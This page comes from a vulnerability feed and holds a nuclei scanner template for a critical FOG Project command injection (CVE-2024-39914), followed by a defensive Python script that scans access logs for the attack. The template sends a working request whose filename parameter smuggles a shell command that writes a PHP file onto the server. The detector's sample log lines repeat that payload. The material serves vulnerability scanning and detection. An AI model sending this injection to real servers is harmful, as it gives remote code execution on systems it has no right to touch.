nuclei | ProjectDiscovery | NUCLEI:CVE-2024-39914
Jul 24, 2024 - 7:39 p.m.

FOG Project < 1.5.10.34 - Remote Command Execution

2024-07-24 19:39:34
ProjectDiscovery
github.com
9
fog project
remote command execution
critical severity
command injection
php
security advisory

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 7.5
Confidence: High

EPSS: 0.001
Percentile: 22.0%

FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.

id: CVE-2024-39914

info:
  name: FOG Project < 1.5.10.34 - Remote Command Execution
  author: securityforeveryone
  severity: critical
  description: |
    FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.
  remediation: Fixed in 1.5.10.34
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39914
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914
    - https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
    - https://blog.csdn.net/qq_39894062/article/details/140550009
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39914
    cwe-id: CWE-77
    epss-score: 0.00043
    epss-percentile: 0.09367
  metadata:
    vendor: fogproject
    product: fogproject
    fofa-query: icon_hash="-1952619005"
  tags: cve,cve2024,rce,fog

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000, 9999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fogguiuser=fog&nojson=2

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"No HTML files!","HTMLDOC")'
          - 'contains(content_type, "application/pdf")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /management/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022075ee2c37d4da90160d134db9e8e9df85d9b449f9095211cc0cb9371aac4dcf53022100de284762c25011f52d379931b93129ff859eb86b044cc0954ea631adfb0b4844:922c64590222798bb761d5b6d8e72950
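
A defender-side check for the request pattern the template above sends, added here as an example (it is not part of the nuclei template or of the FOG project's code): it scans web server access logs for export.php requests whose filename parameter carries anything beyond plain filename characters. The combined log format, the filename allowlist, the function name and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address, request line and status from a combined-log-format entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate export filename needs only these characters.
SAFE_FILENAME_RE = re.compile(r'[A-Za-z0-9._ -]*')
# Matches both /management/export.php and /fog/management/export.php.
EXPORT_PATH = "/management/export.php"

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """
192.0.2.10 - - [24/Jul/2024:19:40:01 +0000] "POST /fog/management/export.php?filename=$(echo+'<?php+echo+md5(1234);+?>'+>+abcdefghijkl.php)&type=pdf HTTP/1.1" 200 512
192.0.2.44 - - [24/Jul/2024:19:41:10 +0000] "POST /fog/management/export.php?filename=Inventory+Report&type=pdf HTTP/1.1" 200 20480
198.51.100.7 - - [24/Jul/2024:19:42:33 +0000] "POST /management/export.php?filename=%24%28id%29&type=pdf HTTP/1.1" 200 498
192.0.2.44 - - [24/Jul/2024:19:43:00 +0000] "GET /fog/management/index.php?node=home HTTP/1.1" 200 9100
""".strip().splitlines()


def suspicious_export_requests(log_lines):
    """Return (client, status, decoded filename) for export.php requests
    whose filename parameter falls outside the allowlist."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(EXPORT_PATH):
            continue
        # parse_qs percent-decodes and maps '+' to a space, so encoded
        # metacharacters (%24%28 for "$(") are checked in decoded form.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("filename", []):
            if not SAFE_FILENAME_RE.fullmatch(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in suspicious_export_requests(SAMPLE_LOG):
        print(f"{client} status={status} filename={value!r}")
```

A hit with status 200 on a version earlier than 1.5.10.34 is worth following up by looking for unexpected .php files under the management directory, since that is where the template's second request looks for its output.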
